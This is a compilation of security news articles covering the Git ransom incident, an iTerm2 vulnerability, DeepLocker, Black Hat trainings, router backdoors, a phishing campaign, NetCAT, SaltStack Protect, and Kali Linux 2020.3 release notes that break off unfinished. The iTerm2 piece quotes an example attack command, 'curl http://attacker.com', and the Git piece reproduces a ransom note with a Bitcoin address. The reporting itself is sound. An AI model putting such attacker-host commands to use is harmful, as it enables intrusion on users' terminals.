Tech News - Security

Yesterday, Atlassian Bitbucket, GitHub, and GitLab published a joint incident report in the wake of the recent Git ransomware attack on the three platforms earlier this month. The post sheds light on the ransom event details, what measures the platforms are taking to protect users, and what are the next steps to be taken by the affected repo owners. https://twitter.com/github/status/1128332167229202433 The Git ransom attack On May 2, the security teams at Atlassian Bitbucket, GitHub, and GitLab started getting numerous reports from users about their accounts being compromised. The reports mentioned that the source code from their repositories, both private and public, was being wiped off and replaced with the following ransom note: “To recover your lost data and avoid leaking it: Send us 0.1 Bitcoin (BTC) to our Bitcoin address 1ES14c7qLb5CYhLMUekctxLgc1FV2Ti9DA and contact us by Email at admin@gitsbackup.com with your Git login and a Proof of Payment. If you are unsure if we have your data, contact us and we will send you a proof. Your code is downloaded and backed up on our servers. If we don't receive your payment in the next 10 Days, we will make your code public or use them otherwise.” The user accounts were compromised with legitimate user credentials including passwords, app passwords, API keys, and personal access tokens. After getting access to the user accounts, the attackers performed command-line Git commits, which resulted in overwriting the source code in repositories with the ransom note. To recover your repository, in case you have its latest copy on your computer, you can force push the local copy to the current HEAD using the ‘git push origin HEAD:master --force’ command. If not, you can clone the repository and use the git reflog or git fsck commands to find your last commit and change the HEAD. What the investigation revealed? A basic GitHub search shows that 267 repositories were affected by the ransom attack. While investigating how the credential leakage happened, the security teams found a public third-party credential dump, which was hosted by the same hosting provider where the attack had originated. The dump had credentials of nearly one-third of the attacked accounts. After finding this out, the platforms took steps to invalidate the credentials by resetting or revoking them. On further investigation, it was found that continuous scanning has been conducted by the same IP address as the attacker for publicly exposed .git/config and other environment files, which may have sensitive information like credentials and personal access tokens. Similar scanning behavior from other IPs residing on the same hosting provider was also found. How you can protect your repositories from such attacks? Strong and unique passwords: Users should use strong and unique passwords as attackers can easily crack simple passwords through brute-force attacks. Enabling multi-factor authentication (MFA): Users are recommended to use multi-factor authentication, which is supported on all three platforms. MFA provides better security by combining two or more independent credentials for authentication. Understanding personal access tokens (PATs) and their risks: PATs serve as an alternative to passwords when you are using two-factor authentication. Users should ensure that these are not publicly accessible in repositories or on web servers as in some situations these tokens may have read or write access to repositories. The report further recommends that users should use them as environment variables and avoid hardcoding them into their programs. Additionally, the three platforms also offer other features through which we can prevent such attacks from recurring. Bitbucket gives admins the authority to control access of users through IP Whitelisting on their Premium plan. GitHub does token scanning on public repositories to check for known token formats and notifies the service providers if secrets are published to public GitHub repositories. GitLab 11.9 comes with a feature called Secret Detection that scans repositories to find API keys and other information that should not be there. To read the official announcement, check out the joint incident report on GitLab blog. GitHub announces beta version of GitHub Package Registry, its new package management service GitHub deprecates and then restores Network Graph after GitHub users share their disapproval DockerHub database breach exposes 190K customer data including tokens for GitHub and Bitbucket repositories  

Yesterday, Mozilla announced that a critical security vulnerability is present in the terminal multiplexer (tmux) integration feature in all the versions of iTerm2, the GPL-licensed terminal emulator for macOS. The security vulnerability was found by a sponsored security audit conducted by the Mozilla Open Source Support Program (MOSS) which delivers security audits for open source technologies. Mozilla and the iTerm2’s developer George Nachman have together developed and released a patch for the vulnerability in the iTerm2 version 3.3.6. Read Also: MacOS terminal emulator, iTerm2 3.3.0 is here with new Python scripting API, a scriptable status bar, Minimal theme, and more According to the official blog post, MOSS sponsored the iTerm2 security audit due to its popularity among developers and system administrators. Another major reason was the iTerm2’s processing of untrusted data. Radically Open Security (ROS), the firm that conducted the audit, has ascertained that this vulnerability was present in iTerm2 for the last 7 years. An attacker can exploit this vulnerability (CVE-2019-9535) by producing a malicious output to the terminal using commands on the targeted user’s computer or by remotely executing arbitrary commands with the privileges of the targeted user. Tom Ritter of Mozilla says, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.” Nachman says that this is a serious vulnerability because “in some circumstances, it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2.” He also strongly recommended all the users to upgrade their iTerm2 to the latest 3.3.6 version. The CERT Coordination Center has pointed out that since the tmux integration cannot be disabled through configuration, the complete resolution to this vulnerability is not yet available. Users have appreciated both Mozilla and the iTerm2 team for the security update. A user commented on Hacker News, “I checked for update, installed and relaunched... and found that all my tabs were exactly as they were before, including my tab that had an ssh tunnel running. The only thing that changed was that iTerm got more secure. Impressive work, Nachman.” Another user says, “Thank you, Mozilla. =)” Visit the Mozilla blog for more details about the vulnerability. Apple’s MacOS Catalina in major turmoil as it kills iTunes and drops support for 32 bit applications Apple iPadOS now available for download with Slide Over and Split View, Home Screen updates, new capabilities to Apple Pencil and more Apple releases Safari 13 with opt-in dark mode support, FIDO2-compliant USB security keys support, and more! The US, UK, and Australian governments call Facebook’s end-to-end encryption plan a hindrance to investigating crimes An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack

In the new found age of Artificial Intelligence, where everything and everyone uses Machine Learning concepts to make life easier, the dark side of the same is can be left unexplored. Cybersecurity is gaining a lot of attention these days.The most influential organizations have experienced a downfall because of undetected malware that have managed to evade even the most secure cyber defense mechanisms. The job just got easier for cyber criminals that exploit AI to empower them and launch attacks. Imagine combining AI with cyber attacks! At last week’s Black Hat USA 2018 conference, IBM researchers presented their newly developed malware “DeepLocker” that is backed up by AI. Weaponized AI seems here to stay. Read Also: Black Hat USA 2018 conference Highlights for cybersecurity professionals All you need to know about DeepLocker Simply put, DeepLocker is a new generation malware which can stealth under the radar and go undetected till its target is reached. It uses an Artificial Intelligence model to identify its target using indicators like facial recognition, geolocation and voice recognition. All of which is easily available on the web these days! What’s interesting is that the malware can hide its malicious payload in carrier applications- like a video conferencing software, and go undetected by most antivirus and malware scanners until it reaches specific victims. Imagine sitting on your computer performing daily tasks. Considering that your profile pictures are available on the internet, your video camera can be manipulated to find a match to your online picture. Once the target (your face) is identified, the malicious payload can be unleashed thanks to your face which serves as a key to unlock the virus. This simple  “trigger condition” to unlock the attack is almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model. The simple logic of  “if this, then that” trigger condition used by DeepLocker is transformed into a deep convolutional network of the AI model.   DeepLocker – AI-Powered Concealment   Source: SecurityIntelligence   The DeepLocker makes it really difficult for malware analysts to answer the 3 main questions- What target is the malware after-  Is it after people’s faces or some other visual clues? What specific instance of the target class is the valid trigger condition? And what is the ultimate goal of the attack payload? Now that’s some commendable work done by the IBM researchers. IBM has always strived to make a mark in the field of innovation. DeepLocker comes as no surprise as IBM has the highest number of facial recognition patents granted in 2018. BlackHat USA 2018 sneak preview The main aim of the IBM Researchers- Marc Ph. Stoecklin, Jiyong Jang and Dhilung Kirat-  briefing the crowd in the BlackHat USA 2018 conference was, To raise awareness that AI-powered threats like DeepLocker can be expected very soon To demonstrate how attackers have the capability to build stealthy malware that can circumvent defenses commonly deployed today and To provide insights into how to reduce risks and deploy adequate countermeasures. To demonstrate the efficiency of DeepLocker’s capabilities, they designed and demonstrated a proof of concept. The WannaCry virus was camouflaged in a benign video conferencing application so that it remains undetected by antivirus engines and malware sandboxes. As a triggering condition, an individual was selected, and the AI was trained to launch the malware when certain conditions- including the facial recognition of the target- were met. The experiment was, undoubtedly, a success. The DeepLocker is just an experiment by IBM to show how open-source AI tools can be combined with straightforward evasion techniques to build a targeted, evasive and highly effective malware. As the world of cybersecurity is constantly evolving, security professionals will now have to up their game to combat hybrid malware attacks. Found this article Interesting? Read the Security Intelligence blog to discover more. 7 Black Hat USA 2018 conference cybersecurity training highlights 12 common malware types you should know Social engineering attacks – things to watch out for while online  

The 21st International Conference of Black Hat USA 2018, has just concluded. It took place from August 4, 2018 – August 9, 2018 in Las Vegas, Nevada. It is one of the most anticipated conferences of the year for security practitioners, executives, business developers and anyone who is a cybersecurity fanatic and wants to expand their horizon into the world of security. Black Hat USA 2018 opened with four days of technical training followed by the two-day main conference featuring Briefings, Arsenal, Business Hall, and more. The conference covered exclusive training modules that provided a hands-on offensive and defensive skill set building opportunity for security professionals. The Briefings covered the nitty-gritties of all the latest trends in information security. The Business Hall included a network of more than 17,000 InfoSec professionals who evaluated a range of security products offered by Black Hat sponsors. Best cybersecurity Trainings  in the conference: For more than 20 years, Black Hat has been providing its attendees with trainings that stand the test of time and prove to be an asset in penetration testing. The training modules designed exclusively for Black Hat attendees are taken by industry and subject matter experts from all over the world with the goal of shaping the information security landscape. Here’s a look at a few from this year’s conference. #1 Applied Hardware attacks: Embedded and IOT systems This hands-on training was headed by Josh Datko, and Joe Fitzpatrick that: Introduced students to the common interfaces on embedded MIPS and ARM systems Taught them how to exploit physical access to grant themselves software privilege. Focussed on UART, JTAG, and SPI interfaces. Students were given a brief architectural overview. 70% hands-on labs- identifying, observing, interacting, and eventually exploiting each interface. Basic analysis and manipulation of firmware images were also covered. This two-day course was geared toward pen testers, red teamers, exploit developers, and product developers who wished to learn how to take advantage of physical access to systems to assist and enable other attacks. This course also aimed to show security researchers and enthusiasts- who are unwilling to 'just trust the hardware'- to gain deeper insight into how hardware works and can be undermined. #2 Information Operations: Influence, exploit, and counter This fast-moving class included hands-on exercises to apply and reinforce the skills learned during the course of the training. It also included a best IO campaign contest which was conducted live during the class. Trainers David Raymond and Gregory Conti covered information operations theory and practice in depth. Some of the main topics covered were IO Strategies and Tactics, Countering Information Operations and Operations Security and Counter Intelligence. Users learned about Online Personas and explored the use of bots and AI to scale attacks and defenses. Other topics included understanding performance and assessment metrics, how to respond to an IO incident, exploring the concepts of Deception and counter-deception, and Cyber-enabled IO. #3 Practical Vulnerability discovery with fuzzing: Abdul Aziz Hariri and Brian Gorenc trained students on techniques to quickly identify common patterns in specifications that produce vulnerable conditions in the network. The course covered the following- Learning the process to build a successful fuzzer, and highlight public fuzzing frameworks that produce quality results. “Real world" case studies that demonstrated the fundamentals being introduced. Leverage existing fuzzing frameworks, develop their own test harnesses, integrate publicly available data generation engines and automate the analysis of crashing test cases. This class was aimed at individuals wanting to learn the fundamentals of the fuzzing process, develop advanced fuzzing frameworks, and/or improve their bug finding capabilities. #4 Active Directory Attacks for Red and Blue teams: Nikhil Mittal’s main aim to conduct the training was to change how you test an Active Directory Environment. To secure Active Directory, it is important to understand different techniques and attacks used by adversaries against it. The AD environments lack the ability to tackle latest threats. Hence, this training was aimed towards attacking modern AD Environment using built-in tools like PowerShell and other trusted OS resources. The training was based on real-world penetration tests and Red Team engagements for highly secured environments. Some of the techniques used in the course were- Extensive AD Enumeration Active Directory trust mapping and abuse. Privilege Escalation (User Hunting, Delegation issues and more) Kerberos Attacks and Defense (Golden, Silver ticket, Kerberoast and more) Abusing cross-forest trust (Lateral movement across forest, PrivEsc and more) Attacking Azure integration and components Abusing SQL Server trust in AD (Command Execution, trust abuse, lateral movement) Credentials Replay Attacks (Over-PTH, Token Replay etc.) Persistence (WMI, GPO, ACLs and more) Defenses (JEA, PAW, LAPS, Deception, App Whitelisting, Advanced Threat Analytics etc.) Bypassing defenses Attendees also acquired a free one month access to an Active Directory environment. This comprised of multiple domains and forests, during and after the training. #5 Hands-on Power Analysis and Glitching with ChipWhisperer This course was suited for anyone dealing with embedded systems who needed to understand the threats that can be used to break even a "perfectly secure" system. Side-Channel Power Analysis can be used to read out an AES-128 key in less than 60 seconds from a standard implementation on a small microcontroller. Colin O'Flynn helped the students understand whether their systems were vulnerable to such an attack or not. The course was loaded with hands-on examples to teach them about attacks and theories. The course included a ChipWhisperer-Lite, that students could walk away with the hardware provided during the lab sessions. During the two-day course, topics covered included : Theory behind side-channel power analysis, Measuring power in existing systems, Setting up the ChipWhisperer hardware & software, Several demonstrated attacks, Understanding and demonstration glitch attacks, and Analyzing your own hardware #6 Threat Hunting with attacker TTPs A proper Threat Hunting program focused on maximizing the effectiveness of scarce network defense resources to protect against a potentially limitless threat was the main aim of this class. Threat Hunting takes a different perspective on performing network defense, relying on skilled operators to investigate and find the presence of malicious activity. This training used standard network defense and incident response (which target flagging known malware). It focussed on abnormal behaviors and the use of attacker Tactics, Techniques, and Procedures (TTPs). Trainers Jared Atkinson, Robby Winchester and Roberto Rodriquez taught students on how to create threat hunting hypotheses based on attacker TTPs to perform threat hunting operations and detect attacker activity. In addition, they used free and open source data collection and analysis tools (Sysmon, ELK and Automated Collection and Enrichment Platform) to gather and analyze large amounts of host information to detect malicious activity. They used these techniques and toolsets to create threat hunting hypotheses and perform threat hunting in a simulated enterprise network undergoing active compromise from various types of threat actors. The class was intended for defenders wanting to learn how to effectively hunt threats in enterprise networks. #7 Hands-on Hardware Hacking Training: The class, taught by Joe Grand, took the students through the process of reverse engineering and defeating the security of electronic devices. The comprehensive training covered Product teardown Component identification Circuit board reverse engineering Soldering and desoldering Signal monitoring and analysis, and memory extraction, using a variety of tools including a logic analyzer, multimeter, and device programmer. It concluded with a final challenge where users identify, reverse engineer, and defeat the security mechanism of a custom embedded system. Users interested in hardware hacking, including security researchers, digital forensic investigators, design engineers, and executive management benefitted from this class. And that’s not all! Some other trainings include-- Software defined radio, a guide to threat hunting utilizing the elk stack and machine learning, AWS and Azure exploitation: making the cloud rain shells and much more. This is just a brief overview of the BlackHat USA 2018 conference, where we have handpicked a select few trainings. You can see the full schedule along with the list of selected research papers at the BlackHat Website. And if you missed out this one, fret not. There is another conference happening soon from 3rd December to 6th December 2018. Check out the official website for details. Top 5 cybersecurity trends you should be aware of in 2018 Top 5 cybersecurity myths debunked A new WPA/WPA2 security attack in town: Wi-fi routers watch out!  

In today’s world, organizations and companies go to great lengths to protect themselves from network breaches. However, even a pinhole is enough for the attackers to intrude into any system. Last week, routers by Cisco and Huawei were hacked by two separate groups using different methods. Cisco’s routers were hacked using a backdoor attack while Huawei routers were exploited using a much older vulnerability programming code. An abnormal rise in the Cisco router backdoors Cisco in the year 2004 had written the IETF proposal for a “lawful intercept” backdoor for their routers. This proposal stated that the law enforcement teams could use the intercept to remotely log in to routers. These routers which are sold to ISPs and other large enterprises would allow the law enforcement agents to wiretap IP networks. These law enforcement agents are supposed to gain such an access only via a court order or other legal access request. [box type="shadow" align="" class="" width=""]A backdoor is a malware type which can surpass the normal authentication process for accessing any system or application. Some backdoors are legitimate and assist, for instance, manufacturers to regain lost passwords. However, these backdoors can be used by attackers to remotely access the systems without anyone on the system knowing it.[/box] However, later in the year 2010, an IBM security researcher stated that such a protocol would give an easy access to malicious attackers and would take over Cisco IOS routers. Also, the ISPs related to these routers would also end up being hacked. Some undocumented backdoors were discovered in the year 2013, 2014, 2015, and 2017. According to Tom’s Hardware, this year alone, Cisco recorded five different backdoors within their routers, which resulted in a security flaw for the company’s routers. Let’s have a look at the list of undocumented backdoors found and when. The month of March recorded two backdoors. Firstly, a hardcoded account with the username ‘cisco’, which would have provided an intrusion within more than 8.5 million Cisco routers and switches in a remote mode. Another hardcoded password was found for Cisco's Prime Collaboration Provisioning (PCP) software. This software is used for the remote installation of Cisco voice and video products. May revealed another backdoor in Cisco’s Digital Network Architecture (DNA) Center. This center is used by enterprises to provision devices across a network. Further, in the month of June, Cisco’s Wide Area Application Services (WAAS) found a backdoor account. Note that this is a software tool for traffic optimizations in the Wide Area Network (WAN). The most recent backdoor, found this month, was in the Cisco Policy Suite, which is a software suite for ISPs and large companies that can manage a network’s bandwidth policies. Using this backdoor, the attacker gets a root access to the network with no mitigations against it. However, this backdoor has been patched with Cisco’s software update. The question that arises from these incidents is whether these backdoors were created accidentally or actually by intruders? The recurrence of such incidents does not paint a good picture of Cisco as a responsible, reliable and trustworthy network for end users. Botnet built in a day brings down Huawei routers Researchers from the NewSky security spotted a new botnet last week, which nearly enslaved 18,000 Huawei’s IoT devices within a day. [box type="shadow" align="" class="" width=""]Botnets are huge networks of enslaved devices and can be used to perform distributed denial-of-service attack (DDoS attack), send malicious packets of data to a device, and remotely execute code.[/box] The most striking feature of this huge botnet is that it was built within a day and with a vulnerability which was previously known, as CVE-2017-17215. Anubhav said, “It's painfully hilarious how attackers can construct big bot armies with known vulns"This botnet was created by a hacker, nicknamed Anarchy, says Ankit Anubhav, security researcher at NewSky security. Other security firms including Rapid7 and Qihoo 360 Netlab also confirmed the existence of this new botnet. They first noticed a huge increase in Huawei’s device scanning. Anubhav states that the hacker revealed to him an IP list of victims. This list has not been made public yet. He further adds that the same code was released as public in January this year. The same code was used in the Satori and Brickerbot botnets, and also within other botnets based on Mirai botnets (Mirai botnets were used in 2016 to disrupt Internet services across the US on a huge scale). The NetSky security researcher suspects that Anarchy may be the same hacker known as Wicked, who was linked with the creation of the Owari/Sora botnets. Moreover, Anarchy/Wicked told the researcher that they also plan to start a scan for Realtek router vulnerability CVE-2014-8361, in order to enslave more devices. After receiving such a warning from the hacker himself, what new security measures will be taken henceforth? Read more about this Huawei botnet attack on ZDNet. Is Facebook planning to spy on you through your mobile’s microphones? Social engineering attacks – things to watch out for while online DCLeaks and Guccifer 2.0: How hackers used social engineering to manipulate the 2016 U.S. elections

A few days ago researchers from the Lookout Phishing AI reported a mobile-aware phishing campaign that targets non-governmental organizations around the world including UNICEF, a variety of United Nations humanitarian organizations, the Red Cross and UN World Food, etc. The company has also contacted law enforcement and the targeted organizations. “The campaign is using landing pages signed by SSL certificates, to create legitimate-looking Microsoft Office 365 login pages,” Threatpost reports. According to the Lookout Phishing AI researchers, “The infrastructure connected to this attack has been live since March 2019. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign: 111.90.142.105 and 111.90.142.91. The associated IP network block and ASN (Autonomous System Number) is understood by Lookout to be of low reputation and is known to have hosted malware in the past.” The researchers have also detected very interesting techniques used in this campaign. It quickly detects mobile devices and logs keystrokes directly as they are entered in the password field. Simultaneously, the JavaScript code logic on the phishing pages delivers device-specific content based on the device the victim uses. “Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception,” Jeremy Richards, Principal Security Researcher, Lookout Phishing AI wrote in his blog post. Further, the SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. The Lookout researchers said that currently, six certificates are still valid. They also suspect that these attacks may still be ongoing. Alexander García-Tobar, CEO and co-founder of Valimail, told Threatpost via email, “By using deviously coded phishing sites, hackers are attempting to steal login credentials and ultimately seek monetary gain or insider information.” To know more about this news in detail, read Lookout’s official blog post. UK’s NCSC report reveals significant ransomware, phishing, and supply chain threats to businesses A new Stuxnet-level vulnerability named Simjacker used to secretly spy over mobile phones in multiple countries for over 2 years: Adaptive Mobile Security reports Smart Spies attack: Alexa and Google Assistant can eavesdrop or vish (voice phish) unsuspecting users, disclose researchers from SRLabs

Two days ago, Intel disclosed a vulnerability in their 2011 released line of micro processors with  Data Direct I/O Technology (DDIO) and Remote Direct Memory Access (RDMA) technologies. The vulnerability was found by a group of researchers from the Vrije Universiteit Amsterdam and ETH Zurich. The researchers have presented a detailed security analysis of the attack in their paper, NetCAT: Practical Cache Attacks from the Network. The analysis has been implemented by reverse engineering the behavior of Data-Direct I/O (DDIO), also called as Direct Cache Access (DCA) on recent Intel processors. The security analysis resulted in the discovery of the first network-based PRIME+PROBE Cache attack, named NetCAT. The NetCAT attack enables attacks in cooperative and general adversarial settings. The cooperative setting can enable an attacker to build a covert channel between a network client and a sandboxed server process without network. In the general adversarial settings, an attacker can enable disclosure of network timing-based sensitive information. On June 23, 2019, the researchers coordinated the disclosure process with Intel and NCSC (the Dutch national CERT). Intel acknowledged the vulnerability with a bounty and have assigned CVE-2019-11184 to track the issue. What is a NetCAT attack? The threat model implemented in the paper targets victim servers with DDIO equipped Intel processors, which are mostly enabled in all Intel server-grade processors, by default since 2012. The launched cache attack is conducted over a network to a target server, such that secret information can be leaked from the connection between the server and a different client. The researchers say that there are many potential ways to exploit DDIO. The paper states, “For instance, an attacker with physical access to the victim machine could install a malicious PCIe device to directly access the LLC’s DDIO region. Our aim in this paper is to show that a similar attack is feasible even for an attacker with only remote (unprivileged) network access to the victim machine, without the need for any malicious PCIe devices.”  The threat model uses the RDMA in modern NICs to bypass the operating system at the data plane. This provides the remote machines with direct read and write access to a previously specified memory region. The below figure illustrates the model’s target topology, which is also common in data centers. Image Source: NetCAT: Practical Cache Attacks from the Network In order to launch the remote PRIME+PROBE attack, the researchers have used the remote read/write primitives provided by the PCIe device’s DDIO capabilities to remotely measure the cache activity. The paper explains two cooperative DDIO-based attacks. In the first scenario, a covert channel between two clients that are not on the same network is used and in the second scenario a covert channel between a client and a sandboxed process on a server is used. In both scenarios, it was found that the transmission rounds are loosely synchronized with a predefined time window. An attacker can control the machine with an RDMA link to an application server by using the remote PRIME+PROBE to detect network activity in the LLC as shown in the above figure. The user then opens an interactive SSH session to the application server from a different machine. In an interactive SSH session, each keystroke is sent in a separate packet. The attacker is able to recover the inter-packet times from the cache using the ring buffer location and map them to keystrokes. The security analysis successfully explored the implications of the NetCAT attack, and proved that the DDIO feature on modern Intel CPUs does exposes the system to cache attacks over the network. The researchers believe that “We have merely scratched the surface of possibilities for network-based cache attacks, and we expect similar attacks based on NetCAT in the future. We hope that our efforts caution processor vendors against exposing microarchitectural elements to peripherals without a thorough security design to prevent abuse.” A video demonstrating the NetCAT attack is shown below: https://www.youtube.com/watch?v=QXut1XBymAk In the paper, various other NetCAT-like attacks like the PCIe to CPU attacks have been discussed which may be generalized beyond the given proof-of-concept scenarios. The researchers have also explained various possible mitigations like disabling DDIO, LLC partitioning, and DDIO improvement against these last-level cache side-channel attacks from PCIe devices. With repeated vulnerabilities being found in Intel, many are beginning to distrust Intel. Some are even considering moving away to other alternatives. A Redditor comments, “Another one? Come on man, my i7 2600k already works like crap, and now another vulnerability that surely will affect performance via patches appeared? It is settled, next month I'm ditching Intel.” Another comment read, “Soooo the moral of the story is, never buy Intel chips.” For more information about the attack, interested readers can head over to the NetCAT: Practical Cache Attacks from the Network paper for more information. Other Intel news Intel discloses four new vulnerabilities labeled MDS attacks affecting Intel chips Intel unveils the first 3D Logic Chip packaging technology, ‘Foveros’, powering its new 10nm chips, ‘Sunny Cove’ IBM open-sources Power ISA and other chips; brings OpenPOWER foundation under the Linux Foundation

On Tuesday, SaltStack, the creators of intelligent automation for IT operations and security teams, announced the general availability of SaltStack Protect. SaltStack Protect is for automated discovery and remediation of security vulnerabilities across web-scale infrastructure. It is a new product available in the SaltStack SecOps family of products and is an addition to SaltStack Comply. SaltStack Comply automates the work of continuous compliance and has been updated with new CIS Benchmark content and a new SDK for the creation of custom security checks. The SaltStack SecOps products provides a collaborative platform for both security and IT operations teams to help customers break down organizational silos, offset security and IT skills gaps and talent shortages. “The massive amount of coordination and work required to actually fix thousands of infrastructure security vulnerabilities as quickly as possible is daunting. Vulnerability assessment and management tools require integrated and automated remediation to close the loop on IT security. SaltStack Protect gives security operations teams the power to control, optimize, and secure the entirety of their IT infrastructure while helping teams collaborate to mitigate risk.” said Marc Chenn, SaltStack CEO. Key features in SaltStack Protect As per the team, SaltStack Protect automates the remediation of vulnerabilities by delivering closed-loop workflows to scan, detect, prioritize, and fix critical security threats. Other capabilities include: Native CVE scanning – SaltStack Protect scans for both on-premise and cloud systems to detect threats based on more than 12,000 CVEs across operating systems and infrastructure. Intelligent vulnerability prioritization – To assess and prioritize threats for remediation, SaltStack collects real-time data on the configuration state of every asset in an environment and combines it with vulnerability information from SaltStack Protect to accurately differentiate vulnerabilities that are exploitable from those that are not. Automated remediation – SaltStack Protect brings the power of automation to SecOps teams with an API-first solution that scans IT systems for vulnerabilities and then provides out-of-the-box automation workflows to remediate them. As per the company, SaltStack SecOps products are built on SaltStack enterprise delivering a single platform for frictionless collaboration between security and IT teams. This resulted in users having a 95% decrease in the time required to find and fix critical vulnerabilities. While traditional security scanning tools report vulnerabilities that operations teams must investigate, prioritize, test, fix, and then report back to security. SaltStack eliminates nearly all the manual steps associated with vulnerability remediation, potentially saving time, resources, and redundant tools to protect against critical vulnerabilities. SaltStack is used by many IT operations, DevOps and site reliability engineering organizations around the world such as IBM Cloud, eBay, and TD Bank. If you are interested to know more about this news, check out their official blog post. Additionally SaltStack Comply and SaltStack Protect are also available via subscription and you can schedule a trial demo too. DevSecOps and the shift left in security: how Semmle is supporting software developers [Podcast] Why do IT teams need to transition from DevOps to DevSecOps? 5 reasons poor communication can sink DevSecOps 2019 Deloitte tech trends predictions: AI-fueled firms, NoOps, DevSecOps, intelligent interfaces, and more Can DevOps promote empathy in software engineering?

Its that time of year again, time for another Kali Linux release! Quarter #3 – Kali Linux 20202.3. This release has various impressive updates, all of which are ready for immediate download or updating. A quick overview of what’s new since the last release in May 2020: New Shell – Starting the process to switch from “Bash” to “ZSH“ The release of “Win-Kex” – Get ready WSL2 Automating HiDPI support – Easy switching mode Tool Icons – Every default tool now has its own unique icon Bluetooth Arsenal – New set of tools for Kali NetHunter Nokia Support – New devices for Kali NetHunter Setup Process – No more missing network repositories and quicker installs New Shell (Is Coming) Most people who use Kali Linux, (we hope), are very experienced Linux users. As a result, they feel very comfortable around the command line. We understand that “shells” are a very personal and precious thing to everyone (local or remote!), as that is how most people interact with Kali Linux. To the point where lots of experienced users only use a “GUI” to spin up multiple terminals. By default, Kali Linux has always used “bash” (aka “Bourne-Again SHell”) as the default shell, when you open up a terminal or console. Any seasoned Kali user would know the prompt kali@kali:~$ (or root@kali:~# for the older users!) very well! Today, we are announcing the plan to switch over to ZSH shell. This is currently scheduled to be the default shell in 2020.4 (for this 2020.3 release, bash will still be the default). If you have a fresh default install of Kali Linux 2020.3, you should have ZSH already installed (if not, do sudo apt install -y zsh zsh-syntax-highlighting zsh-autosuggestions), ready for a try. However if you installed an earlier version of Kali Linux and have upgraded to 2020.3, your user will be lacking the default ZSH configuration that we cooked with lots of love. So for upgrade users only, make sure to copy the configuration file: kali@kali:~$ cp /etc/skel/.zshrc ~/ kali@kali:~$ Then all you need to do is switch to ZSH: kali@kali:~$ zsh ┌──(kali㉿kali)-[~] └─$ If you like what you see, you can set ZSH as your default (replacing bash) by doing chsh -s /bin/zsh. Which is what we will be doing in 2020.4. We wanted to give the community a notice before this switch happens. This is a very large change (some may argue larger than the Gnome to Xfce switch last year). We are also looking for feedback. We hope we have the right balance of design and functionality, but we know these typically don’t get done perfect the first time. And, we don’t want to overload the default shell with too many features, as lower powered devices will then struggle or it may be hard to on the eyes to read. ZSH has been something we have wanted to do for a long time (even before the switch over to Xfce!). We will be doing extensive testing during this next cycle so we reserve the right to delay the default change, or change direction all together. Again, we encourage you to provide feedback on this process. There is no way we can cover every use case on our own, so your help is important. Q.) Why did you make the switch? What’s wrong with bash? A.) You can do a lot of advanced things with bash, and customize it to do even more, but ZSH allows you to do even more. This was one really large selling point. Q.) Why did you pick ZSH and not fish? A.) In the discussion of switching shells, one of the options that came up is Fish (Friendly Interactive SHell). Fish is a nice shell (probably nicer than ZSH), but realistically it was not a real consideration due to the fact that it is not POSIX compatible. This would cause a lot of issues, as common one-liners just won’t work. Q.) Are you going to use any ZSH frameworks (e.g. Oh-My-ZSH or Prezto)? A.) At this point in time, by default, no. The weight of these would not be workable for lower powered devices. You can still install them yourself afterwards (as many of our team do). Win-KeX Having Kali Linux on “Windows Subsystem for Linux” (WSL) is something we have been taking advantage of since it came out. With the release of WSLv2, the overall functionality and user experience improved dramatically. Today, the experience is improving once more with the introduction of Win-KeX (Windows + Kali Desktop EXperience). After installing it, typing in kex, or clicking on the button, Win-KeX will give you a persistent-session GUI. After getting WSL installed (there’s countless guides online, or you can follow ours), you can install Win-KeX by doing the following: sudo apt update && sudo apt install -y kali-win-kex Afterwards, if you want to make a shortcut, follow our guide, or you can just type in kex! On the subject of WSL (and this is true for Docker and AWS EC2) something we have seen a bit is after getting a desktop environment, people have noticed the tools are not “there”. This is because they are not included by default, to keep the image as small as possible. You either need to manually install them one by one, or grab the default metapackage to get all the tools from out-of-the-box: sudo apt install -y kali-linux-default Please note, Win-KeX does require WSL v2 on x64 as it’s not compatible with WSL v1, or arm64. For more information, please see our documentation page Automating HiDPI HiDPI displays are getting more and more common. Unfortunately, Linux support, out of the box, hasn’t been great (older Linux users may remember a time where this was very common for a lot of hardware changes.). Which means after doing a fresh install, there is a bit of tweaking required to get it working, otherwise the font/text/display may be very small to read. We have had a guide out explaining the process required to get it working, but the process before was a little “fiddly”. We wanted to do better. So we made kali-hidpi-mode. Now, either typing in kali-hidpi-mode or selecting it from the menu (as shown below), should automate switching between HiDPI modes. Tool Icons Over the last few releases, we have been showing the progress on getting more themed icons for tools. We can now say, if you use the default tool listing (kali-linux-default), every tool in the menu (and then a few extra ones!), should have their own icon now. We will be working on adding missing tools to the menu (and creating icons for them) over the next few releases of Kali, as well as expanding into the kali-linux-large metapackage (then kali-tools-everything). We also have plans for these icons, outside of the menu – more information in an upcoming release! Kali NetHunter Bluetooth Arsenal We are proud to introduce Bluetooth Arsenal by yesimxev from the Kali NetHunter team. It combines a set of bluetooth tools in the Kali NetHunter app with some pre-configured workflows and exciting use cases. You can use your external adapter for reconnaissance, spoofing, listening to and injecting audio into various devices, including speakers, headsets, watches, or even cars. Please note that RFCOMM and RFCOMM tty will need to be enabled in kernels from now on to support some of the tools. Kali NetHunter for Nokia Phones Kali NetHunter now supports the Nokia 3.1 and Nokia 6.1 phones, thanks to yesimxev. Images are available on our download site. Please note that those images contain a “minimal Kali rootfs” due to technical reasons but you can easily install all the default tools via sudo apt install -y kali-linux-default. Setup Process The full installer image always had all the packages required for an offline installation but if you installed a Kali Linux system with this image and without disabling the network, the installer would automatically run dist-upgrade during the install. This is done to make sure that you have the latest packages on first boot. And that step can take a very long time, especially after a few months after a release when lots of updates have accumulated. Starting with 2020.3, we disabled the network mirror in the full installer so that you always get the same installation speed, and the same packages and versions for that release – just make sure to update after installing! Whilst we were at it, we fixed another related issue. If you didn’t have network access (either voluntarily or otherwise) during installation, you would get an empty network repository (/etc/apt/sources.list). This means, you would not be able to use apt to install additional 